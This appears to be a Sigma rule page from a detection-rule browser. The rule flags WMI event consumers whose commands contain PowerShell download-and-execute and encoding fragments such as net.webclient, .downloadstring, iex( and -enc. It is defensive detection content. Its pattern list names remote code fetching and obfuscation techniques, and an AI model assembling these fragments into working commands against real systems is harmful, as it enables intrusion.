Phoenix
Sigma IntelligenceBeta
Back to Rules
Detectionhightest

Suspicious Scripting in a WMI Consumer

Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch
Florian Roth (Nextron Systems), Jonhnathan RibeiroCreated Mon Apr 15Updated Sat Sep 09fe21810c-2a8c-478f-8dd3-5a287fb2a0e0windows
Log Source
WindowsWMI Event
ProductWindows← raw: windows
CategoryWMI Event← raw: wmi_event
Detection Logic
Detection Logic1 selector
detection:
    selection_destination:
        - Destination|contains|all:
              - 'new-object'
              - 'net.webclient'
              - '.downloadstring'
        - Destination|contains|all:
              - 'new-object'
              - 'net.webclient'
              - '.downloadfile'
        - Destination|contains:
              - ' iex('
              - ' -nop '
              - ' -noprofile '
              - ' -decode '
              - ' -enc '
              - 'WScript.Shell'
              - 'System.Security.Cryptography.FromBase64Transform'
    condition: selection_destination
False Positives

Legitimate administrative scripts

References
1
Resolving title…
in.security
2
Resolving title…
github.com
3
Resolving title…
github.com
MITRE ATT&CK
Rule Metadata
Rule ID
fe21810c-2a8c-478f-8dd3-5a287fb2a0e0
Status
test
Level
high
Type
Detection
Created
Mon Apr 15
Modified
Sat Sep 09
Author
Florian Roth (Nextron Systems), Jonhnathan Ribeiro
Path
rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
Raw Tags
attack.executionattack.t1059.005
View on GitHub